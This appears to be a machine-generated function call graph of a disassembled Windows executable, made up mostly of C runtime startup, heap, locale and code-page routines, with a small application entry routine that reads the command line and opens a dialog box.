18982->19014 18984 421583 18983->18984 18985 4216c1 GetStdHandle 18984->18985 18987 425757 __set_error_mode 64 API calls 18984->18987 18986 4216cf _strlen 18985->18986 18985->19014 18990 4216e8 WriteFile 18986->18990 18986->19014 18988 421594 18987->18988 18988->18985 18989 4215a6 18988->18989 18989->19014 19036 422646 18989->19036 18990->19014 18993 4215dc GetModuleFileNameA 18994 4215fa 18993->18994 19002 42161d _strlen 18993->19002 18996 422646 _strcpy_s 64 API calls 18994->18996 18998 42160a 18996->18998 19000 41fd8b __invoke_watson 10 API calls 18998->19000 18998->19002 18999 421660 19061 42562e 18999->19061 19000->19002 19002->18999 19052 4256a2 19002->19052 19005 421684 19008 42562e _strcat_s 64 API calls 19005->19008 19007 41fd8b __invoke_watson 10 API calls 19007->19005 19009 421698 19008->19009 19011 4216a9 19009->19011 19012 41fd8b __invoke_watson 10 API calls 19009->19012 19010 41fd8b __invoke_watson 10 API calls 19010->18999 19070 4254c5 19011->19070 19012->19011 19014->18948 19130 42126e GetModuleHandleW 19015->19130 19021 42109c 19018->19021 19020 4210d2 19020->18944 19021->19020 19022 4210b3 Sleep 19021->19022 19134 41ccee 19021->19134 19022->19021 19163 41f84c 19023->19163 19025 423fa2 InitializeCriticalSectionAndSpinCount 19026 423fe6 __close 19025->19026 19026->18960 19164 41ec79 LeaveCriticalSection 19027->19164 19029 41ed51 19029->18953 19031 425766 19030->19031 19032 41eb5e __free_osfhnd 67 API calls 19031->19032 19033 425770 19031->19033 19034 425789 19032->19034 19033->18974 19035 41feb3 __close 6 API calls 19034->19035 19035->19033 19037 422657 19036->19037 19038 42265e 19036->19038 19037->19038 19041 422684 19037->19041 19039 41eb5e __free_osfhnd 67 API calls 19038->19039 19040 422663 19039->19040 19042 41feb3 __close 6 API calls 19040->19042 19043 4215c8 19041->19043 19044 41eb5e __free_osfhnd 67 API calls 19041->19044 19042->19043 19043->18993 19045 41fd8b 19043->19045 19044->19040 19097 41a590 19045->19097 19047 41fdb8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19048 41fe94 GetCurrentProcess TerminateProcess 19047->19048 19049 41fe88 __invoke_watson 19047->19049 19099 41e48e 19048->19099 19049->19048 19051 41feb1 19051->18993 19056 4256b4 19052->19056 19053 4256b8 19054 42164d 19053->19054 19055 41eb5e __free_osfhnd 67 API calls 19053->19055 19054->18999 19054->19010 19057 4256d4 19055->19057 19056->19053 19056->19054 19059 4256fe 19056->19059 19058 41feb3 __close 6 API calls 19057->19058 19058->19054 19059->19054 19060 41eb5e __free_osfhnd 67 API calls 19059->19060 19060->19057 19062 425646 19061->19062 19065 42563f 19061->19065 19063 41eb5e __free_osfhnd 67 API calls 19062->19063 19064 42564b 19063->19064 19066 41feb3 __close 6 API calls 19064->19066 19065->19062 19067 42567a 19065->19067 19068 421673 19066->19068 19067->19068 19069 41eb5e __free_osfhnd 67 API calls 19067->19069 19068->19005 19068->19007 19069->19064 19107 41e50f 19070->19107 19073 4254e8 LoadLibraryA 19074 425612 19073->19074 19075 4254fd GetProcAddress 19073->19075 19074->19014 19075->19074 19077 425513 19075->19077 19076 425570 19096 42559a 19076->19096 19120 41e518 TlsGetValue 19076->19120 19110 41e49d TlsGetValue 19077->19110 19078 41e518 __decode_pointer 6 API calls 19088 4255dd 19078->19088 19081 41e518 __decode_pointer 6 API calls 19081->19074 19084 41e518 __decode_pointer 6 API calls 19084->19096 19085 41e49d __encode_pointer 6 API calls 19086 42552e GetProcAddress 19085->19086 19087 41e49d __encode_pointer 6 API calls 19086->19087 19089 425543 GetProcAddress 19087->19089 19091 41e518 __decode_pointer 6 API calls 19088->19091 19093 4255c5 19088->19093 19090 41e49d __encode_pointer 6 API calls 19089->19090 19092 425558 19090->19092 19091->19093 19092->19076 19094 425562 GetProcAddress 19092->19094 19093->19081 19095 41e49d __encode_pointer 6 API calls 19094->19095 19095->19076 19096->19078 19096->19093 19098 41a59c __VEC_memzero 19097->19098 19098->19047 19100 41e496 19099->19100 19101 41e498 IsDebuggerPresent 19099->19101 19100->19051 19103 424bd9 __invoke_watson 19101->19103 19104 423d00 SetUnhandledExceptionFilter UnhandledExceptionFilter 19103->19104 19105 423d25 GetCurrentProcess TerminateProcess 19104->19105 19106 423d1d __invoke_watson 19104->19106 19105->19051 19106->19105 19108 41e49d __encode_pointer 6 API calls 19107->19108 19109 41e516 19108->19109 19109->19073 19109->19076 19111 41e4b5 19110->19111 19112 41e4d6 GetModuleHandleW 19110->19112 19111->19112 19113 41e4bf TlsGetValue 19111->19113 19114 41e4f1 GetProcAddress 19112->19114 19115 41e4e6 19112->19115 19118 41e4ca 19113->19118 19117 41e4ce GetProcAddress 19114->19117 19116 421215 __crt_waiting_on_module_handle Sleep GetModuleHandleW 19115->19116 19119 41e4ec 19116->19119 19117->19085 19118->19112 19118->19117 19119->19114 19119->19117 19121 41e551 GetModuleHandleW 19120->19121 19122 41e530 19120->19122 19124 41e561 19121->19124 19125 41e56c GetProcAddress 19121->19125 19122->19121 19123 41e53a TlsGetValue 19122->19123 19127 41e545 19123->19127 19126 421215 __crt_waiting_on_module_handle Sleep GetModuleHandleW 19124->19126 19129 41e549 19125->19129 19128 41e567 19126->19128 19127->19121 19127->19129 19128->19125 19128->19129 19129->19084 19131 421282 GetProcAddress 19130->19131 19132 421297 ExitProcess 19130->19132 19131->19132 19133 421292 19131->19133 19133->19132 19135 41cda1 19134->19135 19145 41cd00 19134->19145 19136 41fa4b __calloc_impl 6 API calls 19135->19136 19137 41cda7 19136->19137 19139 41eb5e __free_osfhnd 66 API calls 19137->19139 19138 4216f8 __FF_MSGBANNER 66 API calls 19143 41cd11 19138->19143 19151 41cd99 19139->19151 19140 42154d __NMSG_WRITE 66 API calls 19140->19143 19142 41cd5d RtlAllocateHeap 19142->19145 19143->19138 19143->19140 19144 421299 __mtinitlocknum 3 API calls 19143->19144 19143->19145 19144->19143 19145->19142 19145->19143 19146 41cd8d 19145->19146 19149 41cd92 19145->19149 19145->19151 19152 41cc9f 19145->19152 19160 41fa4b 19145->19160 19148 41eb5e __free_osfhnd 66 API calls 19146->19148 19148->19149 19150 41eb5e __free_osfhnd 66 API calls 19149->19150 19150->19151 19151->19021 19153 41ccab __close 19152->19153 19154 41ed53 __lock 67 API calls 19153->19154 19156 41ccdc __close 19153->19156 19155 41ccc1 19154->19155 19157 41f565 ___sbh_alloc_block 5 API calls 19155->19157 19156->19145 19158 41cccc 19157->19158 19159 41cce5 _malloc LeaveCriticalSection 19158->19159 19159->19156 19161 41e518 __decode_pointer 6 API calls 19160->19161 19162 41fa5b 19161->19162 19162->19145 19163->19025 19164->19029 19166 41c918 19165->19166 19167 41c93f __VEC_memcpy 19166->19167 19168 41c947 19166->19168 19167->19168 19168->18935 19169->18938 21535 41d67c 21536 41d68d 21535->21536 21572 41eba7 HeapCreate 21536->21572 21539 41d6cc 21574 41e8ad GetModuleHandleW 21539->21574 21543 41d6dd __RTC_Initialize 21608 4238b5 21543->21608 21544 41d624 _fast_error_exit 67 API calls 21544->21543 21546 41d6eb 21547 41d6f7 GetCommandLineA 21546->21547 21548 421245 __amsg_exit 67 API calls 21546->21548 21623 42377e 21547->21623 21550 41d6f6 21548->21550 21550->21547 21554 41d71c 21662 42344b 21554->21662 21555 421245 __amsg_exit 67 API calls 21555->21554 21558 41d72d 21677 421304 21558->21677 21559 421245 __amsg_exit 67 API calls 21559->21558 21561 41d734 21562 41d73f 21561->21562 21563 421245 __amsg_exit 67 API calls 21561->21563 21683 4233ec 21562->21683 21563->21562 21573 41d6c0 21572->21573 21573->21539 21735 41d624 21573->21735 21575 41e8c1 21574->21575 21576 41e8c8 21574->21576 21746 421215 21575->21746 21578 41ea30 21576->21578 21579 41e8d2 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 21576->21579 21785 41e5c7 21578->21785 21583 41e91b TlsAlloc 21579->21583 21584 41e969 TlsSetValue 21583->21584 21585 41d6d2 21583->21585 21584->21585 21586 41e97a 21584->21586 21585->21543 21585->21544 21750 4214ff 21586->21750 21589 41e49d __encode_pointer 6 API calls 21590 41e98a 21589->21590 21591 41e49d __encode_pointer 6 API calls 21590->21591 21592 41e99a 21591->21592 21593 41e49d __encode_pointer 6 API calls 21592->21593 21594 41e9aa 21593->21594 21595 41e49d __encode_pointer 6 API calls 21594->21595 21596 41e9ba 21595->21596 21757 41ebd7 21596->21757 21599 41e518 __decode_pointer 6 API calls 21600 41e9db 21599->21600 21600->21578 21761 4210d8 21600->21761 21603 41e518 __decode_pointer 6 API calls 21604 41ea0e 21603->21604 21604->21578 21605 41ea15 21604->21605 21767 41e604 21605->21767 21607 41ea1d GetCurrentThreadId 21607->21585 21837 41f84c 21608->21837 21610 4238c1 GetStartupInfoA 21611 4210d8 __calloc_crt 67 API calls 21610->21611 21618 4238e2 21611->21618 21612 423b00 __close 21612->21546 21613 423a7d GetStdHandle 21617 423a47 21613->21617 21614 423ae2 SetHandleCount 21614->21612 21615 4210d8 __calloc_crt 67 API calls 21615->21618 21616 423a8f GetFileType 21616->21617 21617->21612 21617->21613 21617->21614 21617->21616 21621 423f96 __mtinitlocknum InitializeCriticalSectionAndSpinCount 21617->21621 21618->21612 21618->21615 21618->21617 21620 4239ca 21618->21620 21619 4239f3 GetFileType 21619->21620 21620->21612 21620->21617 21620->21619 21622 423f96 __mtinitlocknum InitializeCriticalSectionAndSpinCount 21620->21622 21621->21617 21622->21620 21624 4237bb 21623->21624 21625 42379c GetEnvironmentStringsW 21623->21625 21627 4237a4 21624->21627 21628 423854 21624->21628 21626 4237b0 GetLastError 21625->21626 21625->21627 21626->21624 21629 4237e6 WideCharToMultiByte 21627->21629 21630 4237d7 GetEnvironmentStringsW 21627->21630 21631 42385d GetEnvironmentStrings 21628->21631 21632 41d707 21628->21632 21636 42381a 21629->21636 21637 423849 FreeEnvironmentStringsW 21629->21637 21630->21629 21630->21632 21631->21632 21633 42386d 21631->21633 21649 4236c3 21632->21649 21638 421093 __malloc_crt 67 API calls 21633->21638 21639 421093 __malloc_crt 67 API calls 21636->21639 21637->21632 21640 423887 21638->21640 21641 423820 21639->21641 21643 42389a _realloc 21640->21643 21644 42388e FreeEnvironmentStringsA 21640->21644 21641->21637 21642 423828 WideCharToMultiByte 21641->21642 21645 423842 21642->21645 21646 42383a 21642->21646 21648 4238a4 FreeEnvironmentStringsA 21643->21648 21644->21632 21645->21637 21647 41a27a _realloc 67 API calls 21646->21647 21647->21645 21648->21632 21650 4236d8 21649->21650 21651 4236dd GetModuleFileNameA 21649->21651 21844 421df6 21650->21844 21653 423704 21651->21653 21838 423529 21653->21838 21656 41d711 21656->21554 21656->21555 21657 423740 21658 421093 __malloc_crt 67 API calls 21657->21658 21659 423746 21658->21659 21659->21656 21660 423529 _parse_cmdline 77 API calls 21659->21660 21661 423760 21660->21661 21661->21656 21663 423454 21662->21663 21666 423459 _strlen 21662->21666 21664 421df6 ___initmbctable 111 API calls 21663->21664 21664->21666 21665 4210d8 __calloc_crt 67 API calls 21672 42348e _strlen 21665->21672 21666->21665 21669 41d722 21666->21669 21667 4234ec 21668 41a27a _realloc 67 API calls 21667->21668 21668->21669 21669->21558 21669->21559 21670 4210d8 __calloc_crt 67 API calls 21670->21672 21671 423512 21673 41a27a _realloc 67 API calls 21671->21673 21672->21667 21672->21669 21672->21670 21672->21671 21674 422646 _strcpy_s 67 API calls 21672->21674 21675 4234d3 21672->21675 21673->21669 21674->21672 21675->21672 21676 41fd8b __invoke_watson 10 API calls 21675->21676 21676->21675 21678 421312 __IsNonwritableInCurrentImage 21677->21678 22274 423189 21678->22274 21680 421330 __initterm_e 21681 41c77f __cinit 74 API calls 21680->21681 21682 42134f __IsNonwritableInCurrentImage __initterm 21680->21682 21681->21682 21682->21561 21684 4233fa 21683->21684 21687 4233ff 21683->21687 21685 421df6 ___initmbctable 111 API calls 21684->21685 21685->21687 21686 41d745 21689 40fcfb 21686->21689 21687->21686 21688 4264e1 __wincmdln 77 API calls 21687->21688 21688->21687 22278 410be8 GetModuleHandleW 21689->22278 21693 40fd1e _memset 21694 40fd2f GetCommandLineW 21693->21694 21695 40fdaa GetModuleFileNameW SetEnvironmentVariableW GetModuleHandleW LoadIconW LoadBitmapW 21694->21695 21696 40fd3e 21694->21696 22285 419dd5 LoadLibraryW LoadLibraryW OleInitialize InitCommonControlsEx SHGetMalloc 21695->22285 22297 40d4fb 21696->22297 21700 40fe06 22286 40c25a 21700->22286 21701 40fda4 21706 40d4a7 2 API calls 21701->21706 21702 40fd4c OpenFileMappingW 21704 40fd65 MapViewOfFile 21702->21704 21705 40fd99 CloseHandle 21702->21705 21707 40fd92 UnmapViewOfFile 21704->21707 21708 40fd76 _realloc 21704->21708 21705->21695 21706->21695 21707->21705 22304 40d4a7 SetEnvironmentVariableW 21708->22304 21709 40fe11 21711 419b45 3 API calls 21709->21711 21712 40fe28 21711->21712 21713 419b45 3 API calls 21712->21713 21714 40fe32 DialogBoxParamW 21713->21714 21715 40fe6c 21714->21715 22291 419e2f 21715->22291 21736 41d632 21735->21736 21737 41d637 21735->21737 21739 4216f8 __FF_MSGBANNER 67 API calls 21736->21739 21738 42154d __NMSG_WRITE 67 API calls 21737->21738 21740 41d63f 21738->21740 21739->21737 21741 421299 __mtinitlocknum 3 API calls 21740->21741 21742 41d649 21741->21742 21742->21539 21747 421220 Sleep GetModuleHandleW 21746->21747 21748 41e8c7 21747->21748 21749 42123e 21747->21749 21748->21576 21749->21747 21749->21748 21751 41e50f _raise 6 API calls 21750->21751 21752 421507 __init_pointers __initp_misc_winsig 21751->21752 21796 41eabe 21752->21796 21755 41e49d __encode_pointer 6 API calls 21756 41e97f 21755->21756 21756->21589 21758 41ebe2 21757->21758 21759 423f96 __mtinitlocknum InitializeCriticalSectionAndSpinCount 21758->21759 21760 41e9c7 21758->21760 21759->21758 21760->21578 21760->21599 21763 4210e1 21761->21763 21764 41e9f4 21763->21764 21765 4210ff Sleep 21763->21765 21799 425177 21763->21799 21764->21578 21764->21603 21766 421114 21765->21766 21766->21763 21766->21764 21816 41f84c 21767->21816 21769 41e610 GetModuleHandleW 21770 41e620 21769->21770 21771 41e626 21769->21771 21772 421215 __crt_waiting_on_module_handle 2 API calls 21770->21772 21773 41e662 21771->21773 21774 41e63e GetProcAddress GetProcAddress 21771->21774 21772->21771 21775 41ed53 __lock 63 API calls 21773->21775 21774->21773 21776 41e681 InterlockedIncrement 21775->21776 21817 41e6d9 21776->21817 21779 41ed53 __lock 63 API calls 21780 41e6a2 21779->21780 21820 421f5d InterlockedIncrement 21780->21820 21782 41e6c0 21832 41e6e2 21782->21832 21784 41e6cd __close 21784->21607 21786 41e5d1 21785->21786 21790 41e5dd 21785->21790 21787 41e518 __decode_pointer 6 API calls 21786->21787 21787->21790 21788 41e5f1 TlsFree 21789 41e5ff 21788->21789 21791 41ec3e DeleteCriticalSection 21789->21791 21792 41ec56 21789->21792 21790->21788 21790->21789 21793 41a27a _realloc 67 API calls 21791->21793 21794 41ec68 DeleteCriticalSection 21792->21794 21795 41ec76 21792->21795 21793->21789 21794->21792 21795->21585 21797 41e49d __encode_pointer 6 API calls 21796->21797 21798 41eac8 21797->21798 21798->21755 21800 425183 __close 21799->21800 21801 42519b 21800->21801 21811 4251ba _memset 21800->21811 21802 41eb5e __free_osfhnd 66 API calls 21801->21802 21803 4251a0 21802->21803 21804 41feb3 __close 6 API calls 21803->21804 21806 4251b0 __close 21804->21806 21805 42522c HeapAlloc 21805->21811 21806->21763 21807 41fa4b __calloc_impl 6 API calls 21807->21811 21808 41ed53 __lock 66 API calls 21808->21811 21809 41f565 ___sbh_alloc_block 5 API calls 21809->21811 21811->21805 21811->21806 21811->21807 21811->21808 21811->21809 21812 425273 21811->21812 21815 41ec79 LeaveCriticalSection 21812->21815 21814 42527a 21814->21811 21815->21814 21816->21769 21835 41ec79 LeaveCriticalSection 21817->21835 21819 41e69b 21819->21779 21821 421f7b InterlockedIncrement 21820->21821 21822 421f7e 21820->21822 21821->21822 21823 421f8b 21822->21823 21824 421f88 InterlockedIncrement 21822->21824 21825 421f95 InterlockedIncrement 21823->21825 21826 421f98 21823->21826 21824->21823 21825->21826 21827 421fa2 InterlockedIncrement 21826->21827 21829 421fa5 21826->21829 21827->21829 21828 421fbe InterlockedIncrement 21828->21829 21829->21828 21830 421fd9 InterlockedIncrement 21829->21830 21831 421fce InterlockedIncrement 21829->21831 21830->21782 21831->21829 21836 41ec79 LeaveCriticalSection 21832->21836 21834 41e6e9 21834->21784 21835->21819 21836->21834 21837->21610 21840 423548 21838->21840 21842 4235b5 21840->21842 21848 4264e1 21840->21848 21841 4236b3 21841->21656 21841->21657 21842->21841 21843 4264e1 77 API calls __wincmdln 21842->21843 21843->21842 21845 421e06 21844->21845 21846 421dff 21844->21846 21845->21651 22089 421c5c 21846->22089 21851 42648e 21848->21851 21854 41ce78 21851->21854 21855 41ce8b 21854->21855 21861 41ced8 21854->21861 21862 41e764 21855->21862 21858 41ceb8 21858->21861 21882 421957 21858->21882 21861->21840 21898 41e6eb GetLastError 21862->21898 21864 41e76c 21865 41ce90 21864->21865 21866 421245 __amsg_exit 67 API calls 21864->21866 21865->21858 21867 4220c3 21865->21867 21866->21865 21868 4220cf __close 21867->21868 21869 41e764 __getptd 67 API calls 21868->21869 21870 4220d4 21869->21870 21871 422102 21870->21871 21873 4220e6 21870->21873 21872 41ed53 __lock 67 API calls 21871->21872 21874 422109 21872->21874 21875 41e764 __getptd 67 API calls 21873->21875 21917 422085 21874->21917 21877 4220eb 21875->21877 21880 4220f9 __close 21877->21880 21881 421245 __amsg_exit 67 API calls 21877->21881 21880->21858 21881->21880 21883 421963 __close 21882->21883 21884 41e764 __getptd 67 API calls 21883->21884 21885 421968 21884->21885 21886 42197a 21885->21886 21887 41ed53 __lock 67 API calls 21885->21887 21890 421988 __close 21886->21890 21894 421245 __amsg_exit 67 API calls 21886->21894 21888 421998 21887->21888 21889 4219e1 21888->21889 21891 4219c9 InterlockedIncrement 21888->21891 21892 4219af InterlockedDecrement 21888->21892 22085 4219f2 21889->22085 21890->21861 21891->21889 21892->21891 21895 4219ba 21892->21895 21894->21890 21895->21891 21896 41a27a _realloc 67 API calls 21895->21896 21897 4219c8 21896->21897 21897->21891 21912 41e593 TlsGetValue 21898->21912 21901 41e758 SetLastError 21901->21864 21902 4210d8 __calloc_crt 64 API calls 21903 41e716 21902->21903 21903->21901 21904 41e518 __decode_pointer 6 API calls 21903->21904 21905 41e730 21904->21905 21906 41e737 21905->21906 21907 41e74f 21905->21907 21908 41e604 __mtinit 64 API calls 21906->21908 21909 41a27a _realloc 64 API calls 21907->21909 21910 41e73f GetCurrentThreadId 21908->21910 21911 41e755 21909->21911 21910->21901 21911->21901 21913 41e5c3 21912->21913 21914 41e5a8 21912->21914 21913->21901 21913->21902 21915 41e518 __decode_pointer 6 API calls 21914->21915 21916 41e5b3 TlsSetValue 21915->21916 21916->21913 21918 422089 21917->21918 21919 4220bb 21917->21919 21918->21919 21920 421f5d ___addlocaleref 8 API calls 21918->21920 21925 42212d 21919->21925 21921 42209c 21920->21921 21921->21919 21928 421fec 21921->21928 22084 41ec79 LeaveCriticalSection 21925->22084 21927 422134 21927->21877 21929 422080 21928->21929 21930 421ffd InterlockedDecrement 21928->21930 21929->21919 21942 421e14 21929->21942 21931 422012 InterlockedDecrement 21930->21931 21932 422015 21930->21932 21931->21932 21933 422022 21932->21933 21934 42201f InterlockedDecrement 21932->21934 21935 42202f 21933->21935 21936 42202c InterlockedDecrement 21933->21936 21934->21933 21937 422039 InterlockedDecrement 21935->21937 21938 42203c 21935->21938 21936->21935 21937->21938 21939 422055 InterlockedDecrement 21938->21939 21940 422065 InterlockedDecrement 21938->21940 21941 422070 InterlockedDecrement 21938->21941 21939->21938 21940->21938 21941->21929 21943 421e98 21942->21943 21944 421e2b 21942->21944 21945 421ee5 21943->21945 21946 41a27a _realloc 67 API calls 21943->21946 21944->21943 21953 41a27a _realloc 67 API calls 21944->21953 21955 421e5f 21944->21955 21970 421f0c 21945->21970 21996 42599e 21945->21996 21948 421eb9 21946->21948 21950 41a27a _realloc 67 API calls 21948->21950 21956 421ecc 21950->21956 21951 41a27a _realloc 67 API calls 21957 421e8d 21951->21957 21952 421f51 21958 41a27a _realloc 67 API calls 21952->21958 21959 421e54 21953->21959 21954 41a27a _realloc 67 API calls 21954->21970 21960 41a27a _realloc 67 API calls 21955->21960 21971 421e80 21955->21971 21962 41a27a _realloc 67 API calls 21956->21962 21965 41a27a _realloc 67 API calls 21957->21965 21966 421f57 21958->21966 21972 425b78 21959->21972 21963 421e75 21960->21963 21961 41a27a 67 API calls _realloc 21961->21970 21964 421eda 21962->21964 21988 425b33 21963->21988 21969 41a27a _realloc 67 API calls 21964->21969 21965->21943 21966->21919 21969->21945 21970->21952 21970->21961 21971->21951 21973 425b85 21972->21973 21987 425c02 21972->21987 21974 425b96 21973->21974 21975 41a27a _realloc 67 API calls 21973->21975 21976 425ba8 21974->21976 21977 41a27a _realloc 67 API calls 21974->21977 21975->21974 21978 425bba 21976->21978 21979 41a27a _realloc 67 API calls 21976->21979 21977->21976 21980 425bcc 21978->21980 21981 41a27a _realloc 67 API calls 21978->21981 21979->21978 21982 425bde 21980->21982 21983 41a27a _realloc 67 API calls 21980->21983 21981->21980 21984 425bf0 21982->21984 21985 41a27a _realloc 67 API calls 21982->21985 21983->21982 21986 41a27a _realloc 67 API calls 21984->21986 21984->21987 21985->21984 21986->21987 21987->21955 21989 425b40 21988->21989 21995 425b74 21988->21995 21990 425b50 21989->21990 21991 41a27a _realloc 67 API calls 21989->21991 21992 41a27a _realloc 67 API calls 21990->21992 21993 425b62 21990->21993 21991->21990 21992->21993 21994 41a27a _realloc 67 API calls 21993->21994 21993->21995 21994->21995 21995->21971 21997 421f05 21996->21997 21998 4259af 21996->21998 21997->21954 21999 41a27a _realloc 67 API calls 21998->21999 22000 4259b7 21999->22000 22001 41a27a _realloc 67 API calls 22000->22001 22002 4259bf 22001->22002 22003 41a27a _realloc 67 API calls 22002->22003 22004 4259c7 22003->22004 22005 41a27a _realloc 67 API calls 22004->22005 22006 4259cf 22005->22006 22007 41a27a _realloc 67 API calls 22006->22007 22008 4259d7 22007->22008 22009 41a27a _realloc 67 API calls 22008->22009 22010 4259df 22009->22010 22011 41a27a _realloc 67 API calls 22010->22011 22012 4259e6 22011->22012 22013 41a27a _realloc 67 API calls 22012->22013 22014 4259ee 22013->22014 22015 41a27a _realloc 67 API calls 22014->22015 22016 4259f6 22015->22016 22017 41a27a _realloc 67 API calls 22016->22017 22018 4259fe 22017->22018 22019 41a27a _realloc 67 API calls 22018->22019 22020 425a06 22019->22020 22021 41a27a _realloc 67 API calls 22020->22021 22084->21927 22088 41ec79 LeaveCriticalSection 22085->22088 22087 4219f9 22087->21886 22088->22087 22090 421c68 __close 22089->22090 22091 41e764 __getptd 67 API calls 22090->22091 22092 421c71 22091->22092 22093 421957 _LocaleUpdate::_LocaleUpdate 69 API calls 22092->22093 22094 421c7b 22093->22094 22120 4219fb 22094->22120 22097 421093 __malloc_crt 67 API calls 22099 421c9c 22097->22099 22098 421dbb __close 22098->21845 22099->22098 22127 421a77 22099->22127 22102 421dc8 22102->22098 22106 421ddb 22102->22106 22108 41a27a _realloc 67 API calls 22102->22108 22103 421ccc InterlockedDecrement 22104 421cdc 22103->22104 22105 421ced InterlockedIncrement 22103->22105 22104->22105 22110 41a27a _realloc 67 API calls 22104->22110 22105->22098 22107 421d03 22105->22107 22109 41eb5e __free_osfhnd 67 API calls 22106->22109 22107->22098 22112 41ed53 __lock 67 API calls 22107->22112 22108->22106 22109->22098 22111 421cec 22110->22111 22111->22105 22114 421d17 InterlockedDecrement 22112->22114 22115 421d93 22114->22115 22116 421da6 InterlockedIncrement 22114->22116 22115->22116 22118 41a27a _realloc 67 API calls 22115->22118 22137 421dbd 22116->22137 22119 421da5 22118->22119 22119->22116 22121 41ce78 _LocaleUpdate::_LocaleUpdate 77 API calls 22120->22121 22122 421a0f 22121->22122 22123 421a1a GetOEMCP 22122->22123 22124 421a38 22122->22124 22125 421a2a 22123->22125 22124->22125 22126 421a3d GetACP 22124->22126 22125->22097 22125->22098 22126->22125 22128 4219fb getSystemCP 79 API calls 22127->22128 22129 421a97 22128->22129 22130 421aa2 setSBCS 22129->22130 22133 421ae6 IsValidCodePage 22129->22133 22136 421b0b _memset __setmbcp_nolock 22129->22136 22131 41e48e __atodbl_l 5 API calls 22130->22131 22132 421c5a 22131->22132 22132->22102 22132->22103 22133->22130 22134 421af8 GetCPInfo 22133->22134 22134->22130 22134->22136 22140 4217c4 GetCPInfo 22136->22140 22273 41ec79 LeaveCriticalSection 22137->22273 22139 421dc4 22139->22098 22141 4218aa 22140->22141 22142 4217f8 _memset 22140->22142 22146 41e48e __atodbl_l 5 API calls 22141->22146 22150 42595c 22142->22150 22148 421955 22146->22148 22148->22136 22149 4224fe ___crtLCMapStringA 102 API calls 22149->22141 22151 41ce78 _LocaleUpdate::_LocaleUpdate 77 API calls 22150->22151 22152 42596f 22151->22152 22160 4257a2 22152->22160 22155 4224fe 22156 41ce78 _LocaleUpdate::_LocaleUpdate 77 API calls 22155->22156 22157 422511 22156->22157 22226 422159 22157->22226 22161 4257c3 GetStringTypeW 22160->22161 22162 4257ee 22160->22162 22163 4257e3 GetLastError 22161->22163 22164 4257db 22161->22164 22162->22164 22165 4258d5 22162->22165 22163->22162 22166 425827 MultiByteToWideChar 22164->22166 22181 4258cf 22164->22181 22188 425ca0 GetLocaleInfoA 22165->22188 22172 425854 22166->22172 22166->22181 22168 41e48e __atodbl_l 5 API calls 22170 421865 22168->22170 22170->22155 22171 425926 GetStringTypeA 22177 425941 22171->22177 22171->22181 22173 425869 _memset __crtGetStringTypeA_stat 22172->22173 22174 41ccee _malloc 67 API calls 22172->22174 22176 4258a2 MultiByteToWideChar 22173->22176 22173->22181 22174->22173 22179 4258b8 GetStringTypeW 22176->22179 22180 4258c9 22176->22180 22178 41a27a _realloc 67 API calls 22177->22178 22178->22181 22179->22180 22184 422139 22180->22184 22181->22168 22185 422145 22184->22185 22187 422156 22184->22187 22186 41a27a _realloc 67 API calls 22185->22186 22185->22187 22186->22187 22187->22181 22189 425cd3 22188->22189 22190 425cce 22188->22190 22219 426cd9 22189->22219 22192 41e48e __atodbl_l 5 API calls 22190->22192 22193 4258f9 22192->22193 22193->22171 22193->22181 22194 425ce9 22193->22194 22195 425d29 GetCPInfo 22194->22195 22199 425db3 22194->22199 22196 425d40 22195->22196 22197 425d9e MultiByteToWideChar 22195->22197 22196->22197 22200 425d46 GetCPInfo 22196->22200 22197->22199 22203 425d59 _strlen 22197->22203 22198 41e48e __atodbl_l 5 API calls 22201 42591a 22198->22201 22199->22198 22200->22197 22202 425d53 22200->22202 22201->22171 22201->22181 22202->22197 22202->22203 22204 41ccee _malloc 67 API calls 22203->22204 22208 425d8b _memset __crtGetStringTypeA_stat 22203->22208 22204->22208 22205 425de8 MultiByteToWideChar 22206 425e00 22205->22206 22207 425e1f 22205->22207 22210 425e07 WideCharToMultiByte 22206->22210 22211 425e24 22206->22211 22209 422139 __freea 67 API calls 22207->22209 22208->22199 22208->22205 22209->22199 22210->22207 22212 425e43 22211->22212 22213 425e2f WideCharToMultiByte 22211->22213 22214 4210d8 __calloc_crt 67 API calls 22212->22214 22213->22207 22213->22212 22215 425e4b 22214->22215 22215->22207 22216 425e54 WideCharToMultiByte 22215->22216 22216->22207 22217 425e66 22216->22217 22218 41a27a _realloc 67 API calls 22217->22218 22218->22207 22222 426cae 22219->22222 22223 426cc7 22222->22223 22224 426a7f strtoxl 91 API calls 22223->22224 22225 426cd4 22224->22225 22225->22190 22227 42217a LCMapStringW 22226->22227 22230 422195 22226->22230 22228 42219d GetLastError 22227->22228 22227->22230 22228->22230 22229 422393 22233 425ca0 ___ansicp 91 API calls 22229->22233 22230->22229 22231 4221ef 22230->22231 22232 422208 MultiByteToWideChar 22231->22232 22249 42238a 22231->22249 22242 422235 22232->22242 22232->22249 22234 4223bb 22233->22234 22237 4223d4 22234->22237 22238 4224af LCMapStringA 22234->22238 22234->22249 22235 41e48e __atodbl_l 5 API calls 22236 421885 22235->22236 22236->22149 22240 425ce9 ___convertcp 74 API calls 22237->22240 22239 42240b 22238->22239 22243 4224d6 22239->22243 22248 41a27a _realloc 67 API calls 22239->22248 22245 4223e6 22240->22245 22241 422286 MultiByteToWideChar 22246 422381 22241->22246 22247 42229f LCMapStringW 22241->22247 22244 41ccee _malloc 67 API calls 22242->22244 22253 42224e __crtGetStringTypeA_stat 22242->22253 22243->22249 22255 41a27a _realloc 67 API calls 22243->22255 22244->22253 22245->22249 22250 4223f0 LCMapStringA 22245->22250 22251 422139 __freea 67 API calls 22246->22251 22247->22246 22252 4222c0 22247->22252 22248->22243 22249->22235 22250->22239 22258 422412 22250->22258 22251->22249 22254 4222c9 22252->22254 22257 4222f2 22252->22257 22253->22241 22253->22249 22254->22246 22256 4222db LCMapStringW 22254->22256 22255->22249 22256->22246 22263 42230d __crtGetStringTypeA_stat 22257->22263 22265 41ccee _malloc 67 API calls 22257->22265 22260 41ccee _malloc 67 API calls 22258->22260 22264 422423 _memset __crtGetStringTypeA_stat 22258->22264 22259 422341 LCMapStringW 22261 42237b 22259->22261 22262 422359 WideCharToMultiByte 22259->22262 22260->22264 22266 422139 __freea 67 API calls 22261->22266 22262->22261 22263->22246 22263->22259 22264->22239 22267 422461 LCMapStringA 22264->22267 22265->22263 22266->22246 22269 422481 22267->22269 22270 42247d 22267->22270 22271 425ce9 ___convertcp 74 API calls 22269->22271 22272 422139 __freea 67 API calls 22270->22272 22271->22270 22272->22239 